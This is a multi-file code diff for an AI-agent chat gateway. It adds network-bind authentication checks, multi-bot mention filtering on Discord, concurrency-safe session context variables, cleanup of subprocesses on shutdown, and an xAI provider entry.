os.environ["MATRIX_FREE_RESPONSE_ROOMS"] = str(frc)
|
||||
if "auto_thread" in matrix_cfg and not os.getenv("MATRIX_AUTO_THREAD"):
|
||||
os.environ["MATRIX_AUTO_THREAD"] = str(matrix_cfg["auto_thread"]).lower()
|
||||
if "dm_mention_threads" in matrix_cfg and not os.getenv("MATRIX_DM_MENTION_THREADS"):
|
||||
os.environ["MATRIX_DM_MENTION_THREADS"] = str(matrix_cfg["dm_mention_threads"]).lower()
|
||||
|
||||
except Exception as e:
|
||||
logger.warning(
|
||||
|
||||
@@ -25,6 +25,7 @@ import hmac
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import socket as _socket
|
||||
import re
|
||||
import sqlite3
|
||||
import time
|
||||
@@ -42,6 +43,7 @@ from gateway.config import Platform, PlatformConfig
|
||||
from gateway.platforms.base import (
|
||||
BasePlatformAdapter,
|
||||
SendResult,
|
||||
is_network_accessible,
|
||||
)
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
@@ -406,7 +408,8 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
Validate Bearer token from Authorization header.
|
||||
|
||||
Returns None if auth is OK, or a 401 web.Response on failure.
|
||||
If no API key is configured, all requests are allowed.
|
||||
If no API key is configured, all requests are allowed (only when API
|
||||
server is local).
|
||||
"""
|
||||
if not self._api_key:
|
||||
return None # No key configured — allow all (local-only use)
|
||||
@@ -1713,8 +1716,16 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
if hasattr(sweep_task, "add_done_callback"):
|
||||
sweep_task.add_done_callback(self._background_tasks.discard)
|
||||
|
||||
# Refuse to start network-accessible without authentication
|
||||
if is_network_accessible(self._host) and not self._api_key:
|
||||
logger.error(
|
||||
"[%s] Refusing to start: binding to %s requires API_SERVER_KEY. "
|
||||
"Set API_SERVER_KEY or use the default 127.0.0.1.",
|
||||
self.name, self._host,
|
||||
)
|
||||
return False
|
||||
|
||||
# Port conflict detection — fail fast if port is already in use
|
||||
import socket as _socket
|
||||
try:
|
||||
with _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM) as _s:
|
||||
_s.settimeout(1)
|
||||
|
||||
@@ -6,10 +6,12 @@ and implement the required methods.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import ipaddress
|
||||
import logging
|
||||
import os
|
||||
import random
|
||||
import re
|
||||
import socket as _socket
|
||||
import subprocess
|
||||
import sys
|
||||
import uuid
|
||||
@@ -19,6 +21,41 @@ from urllib.parse import urlsplit
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def is_network_accessible(host: str) -> bool:
|
||||
"""Return True if *host* would expose the server beyond loopback.
|
||||
|
||||
Loopback addresses (127.0.0.1, ::1, IPv4-mapped ::ffff:127.0.0.1)
|
||||
are local-only. Unspecified addresses (0.0.0.0, ::) bind all
|
||||
interfaces. Hostnames are resolved; DNS failure fails closed.
|
||||
"""
|
||||
try:
|
||||
addr = ipaddress.ip_address(host)
|
||||
if addr.is_loopback:
|
||||
return False
|
||||
# ::ffff:127.0.0.1 — Python reports is_loopback=False for mapped
|
||||
# addresses, so check the underlying IPv4 explicitly.
|
||||
if getattr(addr, "ipv4_mapped", None) and addr.ipv4_mapped.is_loopback:
|
||||
return False
|
||||
return True
|
||||
except ValueError:
|
||||
# when host variable is a hostname, we should try to resolve below
|
||||
pass
|
||||
|
||||
try:
|
||||
resolved = _socket.getaddrinfo(
|
||||
host, None, _socket.AF_UNSPEC, _socket.SOCK_STREAM,
|
||||
)
|
||||
# if the hostname resolves into at least one non-loopback address,
|
||||
# then we consider it to be network accessible
|
||||
for _family, _type, _proto, _canonname, sockaddr in resolved:
|
||||
addr = ipaddress.ip_address(sockaddr[0])
|
||||
if not addr.is_loopback:
|
||||
return True
|
||||
return False
|
||||
except (_socket.gaierror, OSError):
|
||||
return True
|
||||
|
||||
|
||||
def _detect_macos_system_proxy() -> str | None:
|
||||
"""Read the macOS system HTTP(S) proxy via ``scutil --proxy``.
|
||||
|
||||
@@ -613,6 +650,9 @@ class MessageEvent:
|
||||
raw = parts[0][1:].lower() if parts else None
|
||||
if raw and "@" in raw:
|
||||
raw = raw.split("@", 1)[0]
|
||||
# Reject file paths: valid command names never contain /
|
||||
if raw and "/" in raw:
|
||||
return None
|
||||
return raw
|
||||
|
||||
def get_command_args(self) -> str:
|
||||
|
||||
@@ -606,22 +606,35 @@ class DiscordAdapter(BasePlatformAdapter):
|
||||
if not self._client.user or self._client.user not in message.mentions:
|
||||
return
|
||||
# "all" falls through to handle_message
|
||||
|
||||
# If the message @mentions other users but NOT the bot, the
|
||||
# sender is talking to someone else — stay silent. Only
|
||||
# applies in server channels; in DMs the user is always
|
||||
# talking to the bot (mentions are just references).
|
||||
# Controlled by DISCORD_IGNORE_NO_MENTION (default: true).
|
||||
_ignore_no_mention = os.getenv(
|
||||
"DISCORD_IGNORE_NO_MENTION", "true"
|
||||
).lower() in ("true", "1", "yes")
|
||||
if _ignore_no_mention and message.mentions and not isinstance(message.channel, discord.DMChannel):
|
||||
_bot_mentioned = (
|
||||
|
||||
# Multi-agent filtering: if the message mentions specific bots
|
||||
# but NOT this bot, the sender is talking to another agent —
|
||||
# stay silent. Messages with no bot mentions (general chat)
|
||||
# still fall through to _handle_message for the existing
|
||||
# DISCORD_REQUIRE_MENTION check.
|
||||
#
|
||||
# This replaces the older DISCORD_IGNORE_NO_MENTION logic
|
||||
# with bot-aware filtering that works correctly when multiple
|
||||
# agents share a channel.
|
||||
if not isinstance(message.channel, discord.DMChannel) and message.mentions:
|
||||
_self_mentioned = (
|
||||
self._client.user is not None
|
||||
and self._client.user in message.mentions
|
||||
)
|
||||
if not _bot_mentioned:
|
||||
return # Talking to someone else, don't interrupt
|
||||
_other_bots_mentioned = any(
|
||||
m.bot and m != self._client.user
|
||||
for m in message.mentions
|
||||
)
|
||||
# If other bots are mentioned but we're not → not for us
|
||||
if _other_bots_mentioned and not _self_mentioned:
|
||||
return
|
||||
# If humans are mentioned but we're not → not for us
|
||||
# (preserves old DISCORD_IGNORE_NO_MENTION=true behavior)
|
||||
_ignore_no_mention = os.getenv(
|
||||
"DISCORD_IGNORE_NO_MENTION", "true"
|
||||
).lower() in ("true", "1", "yes")
|
||||
if _ignore_no_mention and not _self_mentioned and not _other_bots_mentioned:
|
||||
return
|
||||
|
||||
await self._handle_message(message)
|
||||
|
||||
|
||||
@@ -1190,6 +1190,8 @@ class FeishuAdapter(BasePlatformAdapter):
|
||||
lambda data: self._on_reaction_event("im.message.reaction.deleted_v1", data)
|
||||
)
|
||||
.register_p2_card_action_trigger(self._on_card_action_trigger)
|
||||
.register_p2_im_chat_member_bot_added_v1(self._on_bot_added_to_chat)
|
||||
.register_p2_im_chat_member_bot_deleted_v1(self._on_bot_removed_from_chat)
|
||||
.build()
|
||||
)
|
||||
|
||||
|
||||
@@ -18,6 +18,7 @@ Environment variables:
|
||||
MATRIX_REQUIRE_MENTION Require @mention in rooms (default: true)
|
||||
MATRIX_FREE_RESPONSE_ROOMS Comma-separated room IDs exempt from mention requirement
|
||||
MATRIX_AUTO_THREAD Auto-create threads for room messages (default: true)
|
||||
MATRIX_DM_MENTION_THREADS Create a thread when bot is @mentioned in a DM (default: false)
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
@@ -1043,6 +1044,13 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
if not self._is_bot_mentioned(body, formatted_body):
|
||||
return
|
||||
|
||||
# DM mention-thread: when enabled, @mentioning bot in a DM creates a thread.
|
||||
if is_dm and not thread_id:
|
||||
dm_mention_threads = os.getenv("MATRIX_DM_MENTION_THREADS", "false").lower() in ("true", "1", "yes")
|
||||
if dm_mention_threads and self._is_bot_mentioned(body, source_content.get("formatted_body")):
|
||||
thread_id = event.event_id
|
||||
self._track_thread(thread_id)
|
||||
|
||||
# Strip mention from body when present (including in DMs).
|
||||
if self._is_bot_mentioned(body, source_content.get("formatted_body")):
|
||||
body = self._strip_mention(body)
|
||||
@@ -1360,6 +1368,13 @@ class MatrixAdapter(BasePlatformAdapter):
|
||||
if not self._is_bot_mentioned(body, formatted_body):
|
||||
return
|
||||
|
||||
# DM mention-thread: when enabled, @mentioning bot in a DM creates a thread.
|
||||
if is_dm and not thread_id:
|
||||
dm_mention_threads = os.getenv("MATRIX_DM_MENTION_THREADS", "false").lower() in ("true", "1", "yes")
|
||||
if dm_mention_threads and self._is_bot_mentioned(body, source_content.get("formatted_body")):
|
||||
thread_id = event.event_id
|
||||
self._track_thread(thread_id)
|
||||
|
||||
# Strip mention from body when present (including in DMs).
|
||||
if self._is_bot_mentioned(body, source_content.get("formatted_body")):
|
||||
body = self._strip_mention(body)
|
||||
|
||||
+88
-25
@@ -1348,12 +1348,28 @@ class GatewayRunner:
|
||||
for key, entry in _expired_entries:
|
||||
try:
|
||||
await self._async_flush_memories(entry.session_id)
|
||||
# Shut down memory provider on the cached agent
|
||||
cached_agent = self._running_agents.get(key)
|
||||
if cached_agent and cached_agent is not _AGENT_PENDING_SENTINEL:
|
||||
# Shut down memory provider and close tool resources
|
||||
# on the cached agent. Idle agents live in
|
||||
# _agent_cache (not _running_agents), so look there.
|
||||
_cached_agent = None
|
||||
_cache_lock = getattr(self, "_agent_cache_lock", None)
|
||||
if _cache_lock is not None:
|
||||
with _cache_lock:
|
||||
_cached = self._agent_cache.get(key)
|
||||
_cached_agent = _cached[0] if isinstance(_cached, tuple) else _cached if _cached else None
|
||||
# Fall back to _running_agents in case the agent is
|
||||
# still mid-turn when the expiry fires.
|
||||
if _cached_agent is None:
|
||||
_cached_agent = self._running_agents.get(key)
|
||||
if _cached_agent and _cached_agent is not _AGENT_PENDING_SENTINEL:
|
||||
try:
|
||||
if hasattr(cached_agent, 'shutdown_memory_provider'):
|
||||
cached_agent.shutdown_memory_provider()
|
||||
if hasattr(_cached_agent, 'shutdown_memory_provider'):
|
||||
_cached_agent.shutdown_memory_provider()
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
if hasattr(_cached_agent, 'close'):
|
||||
_cached_agent.close()
|
||||
except Exception:
|
||||
pass
|
||||
# Mark as flushed and persist to disk so the flag
|
||||
@@ -1536,6 +1552,14 @@ class GatewayRunner:
|
||||
agent.shutdown_memory_provider()
|
||||
except Exception:
|
||||
pass
|
||||
# Close tool resources (terminal sandboxes, browser daemons,
|
||||
# background processes, httpx clients) to prevent zombie
|
||||
# process accumulation.
|
||||
try:
|
||||
if hasattr(agent, 'close'):
|
||||
agent.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
for platform, adapter in list(self.adapters.items()):
|
||||
try:
|
||||
@@ -1558,7 +1582,25 @@ class GatewayRunner:
|
||||
self._pending_messages.clear()
|
||||
self._pending_approvals.clear()
|
||||
self._shutdown_event.set()
|
||||
|
||||
|
||||
# Global cleanup: kill any remaining tool subprocesses not tied
|
||||
# to a specific agent (catch-all for zombie prevention).
|
||||
try:
|
||||
from tools.process_registry import process_registry
|
||||
process_registry.kill_all()
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
from tools.terminal_tool import cleanup_all_environments
|
||||
cleanup_all_environments()
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
from tools.browser_tool import cleanup_all_browsers
|
||||
cleanup_all_browsers()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
from gateway.status import remove_pid_file, write_runtime_status
|
||||
remove_pid_file()
|
||||
try:
|
||||
@@ -2400,8 +2442,8 @@ class GatewayRunner:
|
||||
# Build session context
|
||||
context = build_session_context(source, self.config, session_entry)
|
||||
|
||||
# Set environment variables for tools
|
||||
self._set_session_env(context)
|
||||
# Set session context variables for tools (task-local, concurrency-safe)
|
||||
_session_env_tokens = self._set_session_env(context)
|
||||
|
||||
# Read privacy.redact_pii from config (re-read per message)
|
||||
_redact_pii = False
|
||||
@@ -3234,8 +3276,8 @@ class GatewayRunner:
|
||||
"Try again or use /reset to start a fresh session."
|
||||
)
|
||||
finally:
|
||||
# Clear session env
|
||||
self._clear_session_env()
|
||||
# Restore session context variables to their pre-handler state
|
||||
self._clear_session_env(_session_env_tokens)
|
||||
|
||||
def _format_session_info(self) -> str:
|
||||
"""Resolve current model config and return a formatted info block.
|
||||
@@ -3335,8 +3377,22 @@ class GatewayRunner:
|
||||
_flush_task.add_done_callback(self._background_tasks.discard)
|
||||
except Exception as e:
|
||||
logger.debug("Gateway memory flush on reset failed: %s", e)
|
||||
# Close tool resources on the old agent (terminal sandboxes, browser
|
||||
# daemons, background processes) before evicting from cache.
|
||||
# Guard with getattr because test fixtures may skip __init__.
|
||||
_cache_lock = getattr(self, "_agent_cache_lock", None)
|
||||
if _cache_lock is not None:
|
||||
with _cache_lock:
|
||||
_cached = self._agent_cache.get(session_key)
|
||||
_old_agent = _cached[0] if isinstance(_cached, tuple) else _cached if _cached else None
|
||||
if _old_agent is not None:
|
||||
try:
|
||||
if hasattr(_old_agent, "close"):
|
||||
_old_agent.close()
|
||||
except Exception:
|
||||
pass
|
||||
self._evict_cached_agent(session_key)
|
||||
|
||||
|
||||
try:
|
||||
from tools.env_passthrough import clear_env_passthrough
|
||||
clear_env_passthrough()
|
||||
@@ -6120,20 +6176,27 @@ class GatewayRunner:
|
||||
|
||||
return True
|
||||
|
||||
def _set_session_env(self, context: SessionContext) -> None:
|
||||
"""Set environment variables for the current session."""
|
||||
os.environ["HERMES_SESSION_PLATFORM"] = context.source.platform.value
|
||||
os.environ["HERMES_SESSION_CHAT_ID"] = context.source.chat_id
|
||||
if context.source.chat_name:
|
||||
os.environ["HERMES_SESSION_CHAT_NAME"] = context.source.chat_name
|
||||
if context.source.thread_id:
|
||||
os.environ["HERMES_SESSION_THREAD_ID"] = str(context.source.thread_id)
|
||||
|
||||
def _clear_session_env(self) -> None:
|
||||
"""Clear session environment variables."""
|
||||
for var in ["HERMES_SESSION_PLATFORM", "HERMES_SESSION_CHAT_ID", "HERMES_SESSION_CHAT_NAME", "HERMES_SESSION_THREAD_ID"]:
|
||||
if var in os.environ:
|
||||
del os.environ[var]
|
||||
def _set_session_env(self, context: SessionContext) -> list:
|
||||
"""Set session context variables for the current async task.
|
||||
|
||||
Uses ``contextvars`` instead of ``os.environ`` so that concurrent
|
||||
gateway messages cannot overwrite each other's session state.
|
||||
|
||||
Returns a list of reset tokens; pass them to ``_clear_session_env``
|
||||
in a ``finally`` block.
|
||||
"""
|
||||
from gateway.session_context import set_session_vars
|
||||
return set_session_vars(
|
||||
platform=context.source.platform.value,
|
||||
chat_id=context.source.chat_id,
|
||||
chat_name=context.source.chat_name or "",
|
||||
thread_id=str(context.source.thread_id) if context.source.thread_id else "",
|
||||
)
|
||||
|
||||
def _clear_session_env(self, tokens: list) -> None:
|
||||
"""Restore session context variables to their pre-handler values."""
|
||||
from gateway.session_context import clear_session_vars
|
||||
clear_session_vars(tokens)
|
||||
|
||||
async def _enrich_message_with_vision(
|
||||
self,
|
||||
|
||||
@@ -0,0 +1,113 @@
|
||||
"""
|
||||
Session-scoped context variables for the Hermes gateway.
|
||||
|
||||
Replaces the previous ``os.environ``-based session state
|
||||
(``HERMES_SESSION_PLATFORM``, ``HERMES_SESSION_CHAT_ID``, etc.) with
|
||||
Python's ``contextvars.ContextVar``.
|
||||
|
||||
**Why this matters**
|
||||
|
||||
The gateway processes messages concurrently via ``asyncio``. When two
|
||||
messages arrive at the same time the old code did:
|
||||
|
||||
os.environ["HERMES_SESSION_THREAD_ID"] = str(context.source.thread_id)
|
||||
|
||||
Because ``os.environ`` is *process-global*, Message A's value was
|
||||
silently overwritten by Message B before Message A's agent finished
|
||||
running. Background-task notifications and tool calls therefore routed
|
||||
to the wrong thread.
|
||||
|
||||
``contextvars.ContextVar`` values are *task-local*: each ``asyncio``
|
||||
task (and any ``run_in_executor`` thread it spawns) gets its own copy,
|
||||
so concurrent messages never interfere.
|
||||
|
||||
**Backward compatibility**
|
||||
|
||||
The public helper ``get_session_env(name, default="")`` mirrors the old
|
||||
``os.getenv("HERMES_SESSION_*", ...)`` calls. Existing tool code only
|
||||
needs to replace the import + call site:
|
||||
|
||||
# before
|
||||
import os
|
||||
platform = os.getenv("HERMES_SESSION_PLATFORM", "")
|
||||
|
||||
# after
|
||||
from gateway.session_context import get_session_env
|
||||
platform = get_session_env("HERMES_SESSION_PLATFORM", "")
|
||||
"""
|
||||
|
||||
from contextvars import ContextVar
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Per-task session variables
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
_SESSION_PLATFORM: ContextVar[str] = ContextVar("HERMES_SESSION_PLATFORM", default="")
|
||||
_SESSION_CHAT_ID: ContextVar[str] = ContextVar("HERMES_SESSION_CHAT_ID", default="")
|
||||
_SESSION_CHAT_NAME: ContextVar[str] = ContextVar("HERMES_SESSION_CHAT_NAME", default="")
|
||||
_SESSION_THREAD_ID: ContextVar[str] = ContextVar("HERMES_SESSION_THREAD_ID", default="")
|
||||
|
||||
_VAR_MAP = {
|
||||
"HERMES_SESSION_PLATFORM": _SESSION_PLATFORM,
|
||||
"HERMES_SESSION_CHAT_ID": _SESSION_CHAT_ID,
|
||||
"HERMES_SESSION_CHAT_NAME": _SESSION_CHAT_NAME,
|
||||
"HERMES_SESSION_THREAD_ID": _SESSION_THREAD_ID,
|
||||
}
|
||||
|
||||
|
||||
def set_session_vars(
|
||||
platform: str = "",
|
||||
chat_id: str = "",
|
||||
chat_name: str = "",
|
||||
thread_id: str = "",
|
||||
) -> list:
|
||||
"""Set all session context variables and return reset tokens.
|
||||
|
||||
Call ``clear_session_vars(tokens)`` in a ``finally`` block to restore
|
||||
the previous values when the handler exits.
|
||||
|
||||
Returns a list of ``Token`` objects (one per variable) that can be
|
||||
passed to ``clear_session_vars``.
|
||||
"""
|
||||
tokens = [
|
||||
_SESSION_PLATFORM.set(platform),
|
||||
_SESSION_CHAT_ID.set(chat_id),
|
||||
_SESSION_CHAT_NAME.set(chat_name),
|
||||
_SESSION_THREAD_ID.set(thread_id),
|
||||
]
|
||||
return tokens
|
||||
|
||||
|
||||
def clear_session_vars(tokens: list) -> None:
|
||||
"""Restore session context variables to their pre-handler values."""
|
||||
if not tokens:
|
||||
return
|
||||
vars_in_order = [
|
||||
_SESSION_PLATFORM,
|
||||
_SESSION_CHAT_ID,
|
||||
_SESSION_CHAT_NAME,
|
||||
_SESSION_THREAD_ID,
|
||||
]
|
||||
for var, token in zip(vars_in_order, tokens):
|
||||
var.reset(token)
|
||||
|
||||
|
||||
def get_session_env(name: str, default: str = "") -> str:
|
||||
"""Read a session context variable by its legacy ``HERMES_SESSION_*`` name.
|
||||
|
||||
Drop-in replacement for ``os.getenv("HERMES_SESSION_*", default)``.
|
||||
|
||||
Resolution order:
|
||||
1. Context variable (set by the gateway for concurrency-safe access)
|
||||
2. ``os.environ`` (used by CLI, cron scheduler, and tests)
|
||||
3. *default*
|
||||
"""
|
||||
import os
|
||||
|
||||
var = _VAR_MAP.get(name)
|
||||
if var is not None:
|
||||
value = var.get()
|
||||
if value:
|
||||
return value
|
||||
# Fall back to os.environ for CLI, cron, and test compatibility
|
||||
return os.getenv(name, default)
|
||||
+18
-2
@@ -198,6 +198,14 @@ PROVIDER_REGISTRY: Dict[str, ProviderConfig] = {
|
||||
api_key_env_vars=("DEEPSEEK_API_KEY",),
|
||||
base_url_env_var="DEEPSEEK_BASE_URL",
|
||||
),
|
||||
"xai": ProviderConfig(
|
||||
id="xai",
|
||||
name="xAI",
|
||||
auth_type="api_key",
|
||||
inference_base_url="https://api.x.ai/v1",
|
||||
api_key_env_vars=("XAI_API_KEY",),
|
||||
base_url_env_var="XAI_BASE_URL",
|
||||
),
|
||||
"ai-gateway": ProviderConfig(
|
||||
id="ai-gateway",
|
||||
name="AI Gateway",
|
||||
@@ -890,7 +898,7 @@ def resolve_provider(
|
||||
_PROVIDER_ALIASES = {
|
||||
"glm": "zai", "z-ai": "zai", "z.ai": "zai", "zhipu": "zai",
|
||||
"google": "gemini", "google-gemini": "gemini", "google-ai-studio": "gemini",
|
||||
"kimi": "kimi-coding", "moonshot": "kimi-coding",
|
||||
"kimi": "kimi-coding", "kimi-for-coding": "kimi-coding", "moonshot": "kimi-coding",
|
||||
"minimax-china": "minimax-cn", "minimax_cn": "minimax-cn",
|
||||
"claude": "anthropic", "claude-code": "anthropic",
|
||||
"github": "copilot", "github-copilot": "copilot",
|
||||
@@ -1513,7 +1521,15 @@ def _resolve_verify(
|
||||
if effective_insecure:
|
||||
return False
|
||||
if effective_ca:
|
||||
return str(effective_ca)
|
||||
ca_path = str(effective_ca)
|
||||
if not os.path.isfile(ca_path):
|
||||
import logging
|
||||
logging.getLogger("hermes.auth").warning(
|
||||
"CA bundle path does not exist: %s — falling back to default certificates",
|
||||
ca_path,
|
||||
)
|
||||
return True
|
||||
return ca_path
|
||||
return True
|
||||
|
||||
|
||||
|
||||
@@ -69,7 +69,10 @@ COMMAND_REGISTRY: list[CommandDef] = [
|
||||
args_hint="[name]"),
|
||||
CommandDef("branch", "Branch the current session (explore a different path)", "Session",
|
||||
aliases=("fork",), args_hint="[name]"),
|
||||
CommandDef("compress", "Manually compress conversation context", "Session"),
|
||||
CommandDef("compress", "Manually compress conversation context", "Session",
|
||||
args_hint="[focus topic]"),
|
||||
CommandDef("context", "Show live context window breakdown (token usage per component)",
|
||||
"Info", aliases=("ctx",)),
|
||||
CommandDef("rollback", "List or restore filesystem checkpoints", "Session",
|
||||
args_hint="[number]"),
|
||||
CommandDef("stop", "Kill all running background processes", "Session"),
|
||||
|
||||
@@ -1209,8 +1209,8 @@ OPTIONAL_ENV_VARS = {
|
||||
"advanced": True,
|
||||
},
|
||||
"API_SERVER_KEY": {
|
||||
"description": "Bearer token for API server authentication. If empty, all requests are allowed (local use only).",
|
||||
"prompt": "API server auth key (optional)",
|
||||
"description": "Bearer token for API server authentication. Required for non-loopback binding; server refuses to start without it. On loopback (127.0.0.1), all requests are allowed if empty.",
|
||||
"prompt": "API server auth key (required for network access)",
|
||||
"url": None,
|
||||
"password": True,
|
||||
"category": "messaging",
|
||||
@@ -1225,7 +1225,7 @@ OPTIONAL_ENV_VARS = {
|
||||
"advanced": True,
|
||||
},
|
||||
"API_SERVER_HOST": {
|
||||
"description": "Host/bind address for the API server (default: 127.0.0.1). Use 0.0.0.0 for network access — requires API_SERVER_KEY for security.",
|
||||
"description": "Host/bind address for the API server (default: 127.0.0.1). Use 0.0.0.0 for network access — server refuses to start without API_SERVER_KEY.",
|
||||
"prompt": "API server host",
|
||||
"url": None,
|
||||
"password": False,
|
||||
|
||||
+31
-10
@@ -812,45 +812,66 @@ def list_authenticated_providers(
|
||||
# --- 2. Check Hermes-only providers (nous, openai-codex, copilot, opencode-go) ---
|
||||
from hermes_cli.providers import HERMES_OVERLAYS
|
||||
from hermes_cli.auth import PROVIDER_REGISTRY as _auth_registry
|
||||
|
||||
# Build reverse mapping: models.dev ID → Hermes provider ID.
|
||||
# HERMES_OVERLAYS keys may be models.dev IDs (e.g. "github-copilot")
|
||||
# while _PROVIDER_MODELS and config.yaml use Hermes IDs ("copilot").
|
||||
_mdev_to_hermes = {v: k for k, v in PROVIDER_TO_MODELS_DEV.items()}
|
||||
|
||||
for pid, overlay in HERMES_OVERLAYS.items():
|
||||
if pid in seen_slugs:
|
||||
continue
|
||||
|
||||
# Resolve Hermes slug — e.g. "github-copilot" → "copilot"
|
||||
hermes_slug = _mdev_to_hermes.get(pid, pid)
|
||||
if hermes_slug in seen_slugs:
|
||||
continue
|
||||
|
||||
# Check if credentials exist
|
||||
has_creds = False
|
||||
if overlay.extra_env_vars:
|
||||
has_creds = any(os.environ.get(ev) for ev in overlay.extra_env_vars)
|
||||
# Also check api_key_env_vars from PROVIDER_REGISTRY for api_key auth_type
|
||||
if not has_creds and overlay.auth_type == "api_key":
|
||||
pcfg = _auth_registry.get(pid)
|
||||
if pcfg and pcfg.api_key_env_vars:
|
||||
has_creds = any(os.environ.get(ev) for ev in pcfg.api_key_env_vars)
|
||||
if overlay.auth_type in ("oauth_device_code", "oauth_external", "external_process"):
|
||||
for _key in (pid, hermes_slug):
|
||||
pcfg = _auth_registry.get(_key)
|
||||
if pcfg and pcfg.api_key_env_vars:
|
||||
if any(os.environ.get(ev) for ev in pcfg.api_key_env_vars):
|
||||
has_creds = True
|
||||
break
|
||||
if not has_creds and overlay.auth_type in ("oauth_device_code", "oauth_external", "external_process"):
|
||||
# These use auth stores, not env vars — check for auth.json entries
|
||||
try:
|
||||
from hermes_cli.auth import _load_auth_store
|
||||
store = _load_auth_store()
|
||||
if store and (pid in store.get("providers", {}) or pid in store.get("credential_pool", {})):
|
||||
providers_store = store.get("providers", {})
|
||||
pool_store = store.get("credential_pool", {})
|
||||
if store and (
|
||||
pid in providers_store or hermes_slug in providers_store
|
||||
or pid in pool_store or hermes_slug in pool_store
|
||||
):
|
||||
has_creds = True
|
||||
except Exception as exc:
|
||||
logger.debug("Auth store check failed for %s: %s", pid, exc)
|
||||
if not has_creds:
|
||||
continue
|
||||
|
||||
# Use curated list
|
||||
model_ids = curated.get(pid, [])
|
||||
# Use curated list — look up by Hermes slug, fall back to overlay key
|
||||
model_ids = curated.get(hermes_slug, []) or curated.get(pid, [])
|
||||
total = len(model_ids)
|
||||
top = model_ids[:max_models]
|
||||
|
||||
results.append({
|
||||
"slug": pid,
|
||||
"name": get_label(pid),
|
||||
"is_current": pid == current_provider,
|
||||
"slug": hermes_slug,
|
||||
"name": get_label(hermes_slug),
|
||||
"is_current": hermes_slug == current_provider or pid == current_provider,
|
||||
"is_user_defined": False,
|
||||
"models": top,
|
||||
"total_models": total,
|
||||
"source": "hermes",
|
||||
})
|
||||
seen_slugs.add(pid)
|
||||
seen_slugs.add(hermes_slug)
|
||||
|
||||
# --- 3. User-defined endpoints from config ---
|
||||
if user_providers and isinstance(user_providers, dict):
|
||||
|
||||
@@ -129,6 +129,19 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
|
||||
"glm-4.5",
|
||||
"glm-4.5-flash",
|
||||
],
|
||||
"xai": [
|
||||
"grok-4.20-0309-reasoning",
|
||||
"grok-4.20-0309-non-reasoning",
|
||||
"grok-4.20-multi-agent-0309",
|
||||
"grok-4-1-fast-reasoning",
|
||||
"grok-4-1-fast-non-reasoning",
|
||||
"grok-4-fast-reasoning",
|
||||
"grok-4-fast-non-reasoning",
|
||||
"grok-4-0709",
|
||||
"grok-code-fast-1",
|
||||
"grok-3",
|
||||
"grok-3-mini",
|
||||
],
|
||||
"kimi-coding": [
|
||||
"kimi-for-coding",
|
||||
"kimi-k2.5",
|
||||
|
||||
@@ -42,6 +42,11 @@ _PROFILE_DIRS = [
|
||||
"plans",
|
||||
"workspace",
|
||||
"cron",
|
||||
# Per-profile HOME for subprocesses: isolates system tool configs (git,
|
||||
# ssh, gh, npm …) so credentials don't bleed between profiles. In Docker
|
||||
# this also ensures tool configs land inside the persistent volume.
|
||||
# See hermes_constants.get_subprocess_home() and issue #4426.
|
||||
"home",
|
||||
]
|
||||
|
||||
# Files copied during --clone (if they exist in the source)
|
||||
|
||||
@@ -127,6 +127,11 @@ HERMES_OVERLAYS: Dict[str, HermesOverlay] = {
|
||||
is_aggregator=True,
|
||||
base_url_env_var="HF_BASE_URL",
|
||||
),
|
||||
"xai": HermesOverlay(
|
||||
transport="openai_chat",
|
||||
base_url_override="https://api.x.ai/v1",
|
||||
base_url_env_var="XAI_BASE_URL",
|
||||
),
|
||||
}
|
||||
|
||||
|
||||
@@ -163,6 +168,10 @@ ALIASES: Dict[str, str] = {
|
||||
"z.ai": "zai",
|
||||
"zhipu": "zai",
|
||||
|
||||
# xai
|
||||
"x-ai": "xai",
|
||||
"x.ai": "xai",
|
||||
|
||||
# kimi-for-coding (models.dev ID)
|
||||
"kimi": "kimi-for-coding",
|
||||
"kimi-coding": "kimi-for-coding",
|
||||
@@ -341,6 +350,7 @@ def get_label(provider_id: str) -> str:
|
||||
|
||||
|
||||
|
||||
|
||||
def is_aggregator(provider: str) -> bool:
|
||||
"""Return True when the provider is a multi-model aggregator."""
|
||||
pdef = get_provider(provider)
|
||||
|
||||
+27
-24
@@ -151,7 +151,8 @@ def do_search(query: str, source: str = "all", limit: int = 10,
|
||||
|
||||
auth = GitHubAuth()
|
||||
sources = create_source_router(auth)
|
||||
results = unified_search(query, sources, source_filter=source, limit=limit)
|
||||
with c.status("[bold]Searching registries..."):
|
||||
results = unified_search(query, sources, source_filter=source, limit=limit)
|
||||
|
||||
if not results:
|
||||
c.print("[dim]No skills found matching your query.[/]\n")
|
||||
@@ -187,7 +188,7 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
|
||||
Official skills are always shown first, regardless of source filter.
|
||||
"""
|
||||
from tools.skills_hub import (
|
||||
GitHubAuth, create_source_router,
|
||||
GitHubAuth, create_source_router, parallel_search_sources,
|
||||
)
|
||||
|
||||
# Clamp page_size to safe range
|
||||
@@ -198,27 +199,23 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
|
||||
auth = GitHubAuth()
|
||||
sources = create_source_router(auth)
|
||||
|
||||
# Collect results from all (or filtered) sources
|
||||
# Use empty query to get everything; per-source limits prevent overload
|
||||
# Collect results from all (or filtered) sources in parallel.
|
||||
# Per-source limits are generous — parallelism + 30s timeout cap prevents hangs.
|
||||
_TRUST_RANK = {"builtin": 3, "trusted": 2, "community": 1}
|
||||
_PER_SOURCE_LIMIT = {"official": 100, "skills-sh": 100, "well-known": 25, "github": 100, "clawhub": 50,
|
||||
"claude-marketplace": 50, "lobehub": 50}
|
||||
_PER_SOURCE_LIMIT = {
|
||||
"official": 200, "skills-sh": 200, "well-known": 50,
|
||||
